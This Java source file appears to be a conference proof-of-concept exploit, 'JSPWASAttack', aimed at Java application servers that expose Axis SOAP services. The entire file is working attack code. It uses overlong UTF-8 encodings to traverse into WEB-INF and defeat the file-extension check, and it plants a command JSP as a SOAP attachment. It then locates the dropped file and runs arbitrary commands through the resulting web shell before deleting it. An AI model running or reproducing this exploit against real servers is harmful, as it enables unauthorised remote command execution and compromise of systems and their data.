package net.darkmist.defcon18;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

import javax.xml.soap.SOAPException;

import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.contrib.ssl.EasySSLProtocolSocketFactory;
import org.apache.commons.httpclient.methods.GetMethod;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.commons.httpclient.params.HttpMethodParams;
import org.apache.commons.httpclient.protocol.Protocol;
import org.apache.commons.httpclient.protocol.ProtocolSocketFactory;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class JSPWASAttack
{
	private static final Class<JSPWASAttack> CLASS = JSPWASAttack.class;
	@SuppressWarnings("unused")
	private static final String CLASS_NAME = CLASS.getName();
	private static final Logger logger = LoggerFactory.getLogger(CLASS);
	private static final long TIMEOUT = Util.getLongProp(CLASS, "timeout", 10000);
	//private static final long SLEEP = 500;
	private static final long SLEEP = Util.getLongProp(CLASS, "sleep", 100);
	private static final String LONG_PERIOD = "%c0%ae";
	private static final String LONG_NULL = "%c0%80";
	//private static final String JSP_NAME_PREFIX = "tmp.";	// must be three+ chars
	//private static final String JSP_NAME_PREFIX = CLASS_NAME + '.';	// must be three+ chars
	private static final String JSP_NAME_PREFIX = "cmd.";	// must be three+ chars
	private static final String JSP_NAME_SUFFIX = ".jsv";
	private static final String WEB_INF = "WEB-INF";
	private static final String ATTACHMENTS = Util.getStringProp(CLASS, "attachmentsDir", "attachments");
	private HttpClient httpClient;
	private String baseUrl;
	private String pingValue;
	private String authKeyValue;
	private JSPClient jspClient;
	private JSPCopy jspCopier;
	private boolean attachmentsDirExists = false;

	private void init(HttpClient client)
	{
		httpClient = client;
		pingValue = Util.randToken();
		authKeyValue = Util.randToken();
		jspClient = new JSPClient(httpClient, authKeyValue, pingValue);
		jspCopier = new JSPCopy(client, JSP_NAME_PREFIX, JSP_NAME_SUFFIX, pingValue);
	}

	public JSPWASAttack()
	{
		HttpClient client = new HttpClient();
		client.getParams().setParameter(HttpMethodParams.RETRY_HANDLER, new DefaultHttpMethodRetryHandler(0, false));
		Protocol.registerProtocol("https", new Protocol("https", (ProtocolSocketFactory)(new EasySSLProtocolSocketFactory()), 443));
		init(client);
	}

	public JSPWASAttack(HttpClient newHttpClient)
	{
		init(newHttpClient);
	}

	public String getBaseURL()
	{
		return baseUrl;
	}

	public void setBaseURL(String baseURL)
	{
		baseUrl = baseURL;
	}

	protected Set<String> dirListing(String dir) throws IOException
	{
		String dirUrl;
		BufferedReader dirReader;
		GetMethod get;
		String file;
		Set<String> set = new HashSet<String>();
		
		if(dir.startsWith("/"))
			dir = dir.substring(1);
		if(!dir.endsWith("/"))
			dir += '/';
		if(dir.startsWith(WEB_INF))
			dir = LONG_PERIOD + '/' + dir;
		dirUrl = getBaseURL() + dir + LONG_NULL + JSP_NAME_SUFFIX;
		logger.debug("dirUrl=" + dirUrl + '=');

		get = new GetMethod(dirUrl);
		httpClient.executeMethod(get);
		dirReader = new BufferedReader(new InputStreamReader(get.getResponseBodyAsStream()));
		while((file = dirReader.readLine())!=null)
			set.add(file);
		dirReader.close();
		get.releaseConnection();
		return set;
	}

	protected void sendSoapFault(String path) throws IOException, SOAPException
	{
		PostMethod post;
		String url;
		String respBody;
		int code;

		if(path.startsWith("/"))
			path = path.substring(1);
		url = getBaseURL() + path;
		logger.debug("url=" + url + '=');
		post = new PostMethod(url);
		post.setRequestEntity(new SoapAttachment(jspCopier.generate(jspClient.generate())));
		post.addRequestHeader("SOAPAction", Util.getStringProp(CLASS, "SOAPAction","\"\""));
		code = httpClient.executeMethod(post);
		try
		{
			logger.debug("response status {} {}",code, post.getStatusLine());
			respBody = IOUtils.toString(post.getResponseBodyAsStream());
			logger.debug("response body={}", respBody);
			//if(code < 200 || 299 < code)
			if(code != 500)
				throw new RuntimeException("Unexpected response code from server " + code);
		}
		finally
		{
			post.releaseConnection();
		}
	}

	protected int runJspClient(String url, String[] args, int argStart) throws Throwable
	{
		String[] jspArgs;
		int result;

		logger.info("starting cmd jsp client");
		jspArgs = new String[args.length-argStart+1];
		System.arraycopy(args, argStart, jspArgs, 1, args.length-argStart);
		jspArgs[0] = url;
		logger.debug("jspArgs =" + Arrays.toString(jspArgs) + '=');
		result = jspClient.instanceMain(jspArgs);
		if(result!=0)
			logger.warn("non-zero status returned: " + result);
		logger.info("removing cmd jsp");
		jspClient.doRm();
		return result;
	}

	protected Set<String> getAttachmentsDirList() throws IOException
	{
		if(!attachmentsDirExists)
		{
			Set<String> webInfDir;

			logger.debug("checking WEB-INF for existing attachments dir");
			webInfDir = dirListing(WEB_INF);
			if(logger.isDebugEnabled())
				for(String file : webInfDir)
					logger.debug("WEB-INF listing: =" + file + '=');
			if(!webInfDir.contains(ATTACHMENTS))
			{
				logger.debug("attachments dir not present");
				return Collections.emptySet();
			}
			attachmentsDirExists = true;
		}
		logger.debug("attachments dir exists, retreiving");
		return dirListing(WEB_INF + '/' + ATTACHMENTS);
	}

	public int instanceMain(String[] args) throws Throwable
	{
		Set<String> oldAttachments;
		Set<String> newAttachments;
		String url;
		long endTime;
		
		if(args.length < 3)
		{
			logger.error("usage: ctx-url axis-path cmd [args ...]");
			return -1;
		}
		setBaseURL(args[0]);

		logger.info("baselining attachments directory");
		oldAttachments = getAttachmentsDirList();
		if(logger.isDebugEnabled())
			for(String file : oldAttachments)
				logger.debug("attachments listing: =" + file + '=');

		logger.info("sending soap fault");
		sendSoapFault(args[1]);

		endTime = TIMEOUT + System.currentTimeMillis();
		while(true)
		{
			logger.info("looking for new attachments");
			newAttachments = getAttachmentsDirList();
			if(logger.isDebugEnabled())
				for(String file : newAttachments)
					logger.debug("attachments listing: =" + file + '=');
			newAttachments.removeAll(oldAttachments);
			if(logger.isDebugEnabled())
				for(String file : newAttachments)
					logger.debug("diffrent attachments: =" + file + '=');
			for(String attachment : newAttachments)
			{
				String location;
				boolean ping;
	
				url = baseUrl + LONG_PERIOD + '/' + WEB_INF + '/' + ATTACHMENTS + '/' + attachment  + LONG_NULL + JSP_NAME_SUFFIX;
				logger.info("trying attachment {}", url);
				try
				{
					location = jspCopier.call(url);
				}
				catch(JSPCallException e)
				{
					logger.info("URL " + url + " didn't work for jsp copier", e);
					continue;
				}
				logger.info("found copying jsp ({})", url);
				logger.debug("found jspCopier. Client location {}", location);
				jspClient.setURL(location);
				logger.debug("doing ping");
				ping = jspClient.doPing();
				logger.debug("ping={}", ping);
				if(ping)
				{
					logger.info("found cmd jsp ({})", location);
					logger.debug("found jsp=" + location + '=');
					return runJspClient(location, args, 2);
				}
				logger.warn("Copier worked but ping did not?");
			}
			// didn't find it, add new attachments to old attachments
			logger.debug("adding new attachments to old attachments for next run...");
			oldAttachments.addAll(newAttachments);

			if(endTime <= System.currentTimeMillis())
				break;	// timeout
			logger.debug("sleeping =" + SLEEP + "= milliseconds");
			Util.sleep(SLEEP);
			// always do one more check after a SLEEP
		}
		logger.error("timeout looking for jsp attachment");
		return -1;
	}

	public static void main(String[] args) throws Throwable
	{
		System.exit(new JSPWASAttack().instanceMain(args));
	}
}
